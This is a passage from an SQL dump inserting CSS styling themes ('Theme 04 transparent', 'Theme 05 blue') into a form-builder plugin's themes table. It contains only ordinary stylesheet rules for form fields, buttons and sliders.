1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #8A6B63;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0),
(16, 'Theme 04 transparent (gray button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #FFFFFF;\r\nborder: 1px solid #A6A6A6;\r\nmargin-bottom: 10px;\r\ncolor: #A6A6A6;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 15px;\r\n	height: 15px;\r\n	top: -5px;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n@font-face {\r\n	font-family: ArTarumianHandes;\r\n	src: url([SITE_ROOT]/css/HANDES.ttf);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #EDE5DA;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #B3B3B3 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #C0C0C0;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #A8A8A8;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(17, 'Theme 05 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #0E7297;\r\nborder: 1px solid #A0CBDB;\r\nmargin-bottom: 10px;\r\ncolor: #A0CBDB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/01/nextbg_hover.png) url([SITE_ROOT]/images/05/01/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	